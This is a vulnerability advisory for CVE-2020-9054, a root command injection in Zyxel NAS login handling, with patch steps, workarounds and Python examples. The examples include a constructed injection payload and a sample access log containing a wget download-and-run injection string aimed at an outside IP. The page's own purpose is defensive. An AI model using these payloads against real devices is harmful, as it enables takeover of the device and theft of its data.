CVE-2020-9054

Analysis and mitigation of the vulnerability in Multiple Network-Attached Storage (NAS) Devices: CRITICAL (CVSS 9.8)

High-profile threat

Overview

Zyxel NAS devices running firmware version 5.21 contain a critical pre-authentication command injection vulnerability in the weblogin.cgi script. The flaw stems from improper sanitization of the username parameter and allows unauthenticated remote attackers to execute arbitrary commands as root by sending crafted HTTP requests. The CVE record was published on March 4, 2020. CISA lists CVE-2020-9054 as known to be exploited; it is not currently known to be used in ransomware campaigns.

Technical details

The vulnerability lies in the weblogin.cgi web interface of Zyxel NAS devices. The script passes the username parameter of the login request into a shell command without validating or escaping it. An attacker can therefore embed shell metacharacters in the username field (for example a single quote to close the quoted string the script builds, followed by ; and a command) and have the web server execute those commands as root. No credentials are required: the injection happens while the login request is being processed, before any password check takes place.

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) and CWE-20 (Improper Input Validation).

It received a CVSS v3.1 base score of 9.8 (CRITICAL) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: reachable over the network, low attack complexity, no privileges or user interaction required, and high impact on confidentiality, integrity and availability.
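The following is an added example, not Zyxel's code and not taken from this page: a small Python model of the CWE-78 pattern described above next to a hardened version. The real weblogin.cgi is a compiled CGI binary on the NAS; here a plain echo command stands in for whatever backend the script invoked, and the payload shape (closing quote, ;, injected command, # to discard the rest) is the generic command-injection form, not a claim about the exact bytes used against Zyxel devices.

```python
"""Model of the CVE-2020-9054 bug class (CWE-78), not Zyxel's code.

login_vulnerable() concatenates the username into a shell command line the
way the flawed CGI did; login_hardened() validates the value against an
allowlist and hands it to the program as an argv element, so no shell ever
interprets it. 'echo' is a stand-in for the real authentication backend.
"""
import re
import subprocess
from urllib.parse import parse_qs

# Allowlist for usernames: letters, digits, dot, underscore, hyphen, 1-32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")


def username_from_query(query_string: str) -> str:
    """Extract the (percent-decoded) username parameter from a query string."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get("username", [""])[0]


def is_valid_username(username: str) -> bool:
    """True only if the username matches the allowlist exactly."""
    return USERNAME_RE.fullmatch(username) is not None


def login_vulnerable(query_string: str) -> str:
    """Vulnerable: attacker-controlled text reaches 'sh -c' unchanged."""
    username = username_from_query(query_string)
    cmd = f"echo 'login: {username}'"          # string built for the shell
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def login_hardened(query_string: str) -> str:
    """Hardened: allowlist validation plus argv (no shell) invocation."""
    username = username_from_query(query_string)
    if not is_valid_username(username):
        raise ValueError("username rejected: only [A-Za-z0-9._-]{1,32} allowed")
    result = subprocess.run(["echo", f"login: {username}"],
                            capture_output=True, text=True)
    return result.stdout


# Constructed attack query string: username=admin';echo INJECTED;#
# (quote closes the script's string, ';' starts a new command, '#' comments
# out the trailing quote). Percent-encoded as a browser or tool would send it.
ATTACK_QUERY = "username=admin%27%3Becho%20INJECTED%3B%23&password=x"
BENIGN_QUERY = "username=admin&password=x"

if __name__ == "__main__":
    print("vulnerable handler output:")
    print(login_vulnerable(ATTACK_QUERY))      # second line is the injected command
    print("hardened handler, benign input:", login_hardened(BENIGN_QUERY).strip())
    try:
        login_hardened(ATTACK_QUERY)
    except ValueError as exc:
        print("hardened handler, attack input:", exc)
```

Two independent controls are in play: the allowlist rejects the payload before any command is built, and the argv form means that even a value that slipped past validation would be passed as a single argument rather than parsed by a shell. Either alone would have blocked this specific payload; a hardened CGI should keep both.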

Impact

Successful exploitation allows an unauthenticated remote attacker to execute arbitrary commands with root privileges on the Zyxel NAS device. This enables complete compromise of the device, including: unauthorized access to stored data, modification or deletion of files, installation of malware or backdoors, use of the device as a launching point for attacks on other systems, denial of service, and potential lateral movement within connected networks. Given the nature of NAS devices as data storage repositories, this vulnerability poses a severe risk to data confidentiality, integrity, and availability.

Mitigation and workarounds

1. Visit the Zyxel support website and locate your specific NAS model.
2. Download the latest available firmware for that model (5.21(AAZF.5) or newer; fixed build numbers differ per model, so confirm the exact version against Zyxel's advisory for your device).
3. Access the device's web interface over an out-of-band connection if possible, since the vulnerable interface is the one being patched.
4. Navigate to System Settings > Firmware Upgrade.
5. Upload and install the patched firmware.
6. Allow the device to reboot and verify that the upgrade completed.
7. Verify the firmware version under System Information.

The following versions include the necessary fixes: firmware version 5.21(AAZF.5) and later, with various patched versions depending on the specific NAS model. Zyxel's advisory also listed end-of-life NAS models that would not receive a fix; for those devices the workarounds below are the only available mitigation.

As temporary workarounds:
- Restrict network access to the NAS web management interface (ports 80/443) with firewall rules, allowing only trusted IP addresses or subnets; in particular, do not expose the interface to the internet.
- Disable the web management interface entirely if it is not required, and use alternative access methods (SSH, serial console, or out-of-band management).
- Isolate the NAS on a segregated network segment with restricted access from untrusted systems.
- Implement rate limiting and request filtering at the network perimeter to detect and block exploitation attempts, for example by dropping requests to weblogin.cgi whose username parameter contains shell metacharacters.
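As an added example for the last workaround (not from this page or from Zyxel), the scanner below flags web-access-log entries whose username parameter for the login CGI carries shell metacharacters and counts hits per source address so repeated probing stands out. The log lines are constructed for the example, the CGI path /cgi-bin/weblogin.cgi is assumed, and the scanner only sees GET query strings: if the parameter arrives in a POST body, an access log will not contain it and the check has to run in a reverse proxy, WAF or IDS instead.

```python
"""Detect command-injection attempts against weblogin.cgi in access logs.

Added example, not from the page. Log lines are constructed; the CGI path is
an assumption. Only GET query strings are visible in this log format.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/cgi-bin/weblogin.cgi"          # assumed location of the login CGI
SHELL_META = set(";|&$`'\"()<>\n\r")          # characters a shell would interpret

# Common Log Format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log: one benign login, two injection attempts from one
# source, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Mar/2020:10:00:01 +0000] "GET /cgi-bin/weblogin.cgi?username=admin&password=secret HTTP/1.1" 302 0
198.51.100.9 - - [04/Mar/2020:10:00:02 +0000] "GET /cgi-bin/weblogin.cgi?username=admin%27%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx.sh%3B%27&password=x HTTP/1.1" 200 0
198.51.100.9 - - [04/Mar/2020:10:00:03 +0000] "GET /cgi-bin/weblogin.cgi?username=%60id%60&password=x HTTP/1.1" 200 0
203.0.113.7 - - [04/Mar/2020:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 512
"""


def suspicious_username(target: str):
    """Return the decoded username if the request hits the login CGI with
    shell metacharacters in the username parameter, otherwise None."""
    parts = urlsplit(target)
    if parts.path != LOGIN_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for value in params.get("username", []):
        if SHELL_META & set(value):
            return value
    return None


def scan(log_text: str) -> list:
    """Parse each line and collect alerts for injection-shaped login requests."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue                     # not CLF; skip rather than guess
        bad = suspicious_username(m["target"])
        if bad is not None:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "username": bad})
    return alerts


def sources_over_threshold(alerts: list, threshold: int = 2) -> dict:
    """Sources with at least `threshold` alerts: candidates for a perimeter block."""
    counts = Counter(a["ip"] for a in alerts)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['ip']} username={a['username']!r}")
    print("block candidates:", sources_over_threshold(found))
```

Matching on the decoded value matters: the attempts in the sample arrive percent-encoded (%27, %3B, %60), so a naive substring search on the raw request line for a quote or semicolon would miss them. The metacharacter set is deliberately broad; a legitimate username on these devices never needs any of those characters, so the false-positive cost is low.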

CISA recommendation: Apply updates per vendor instructions.

Source: This report was generated by AI.

Related ZyXEL vulnerabilities

No related vulnerabilities with identified affected products.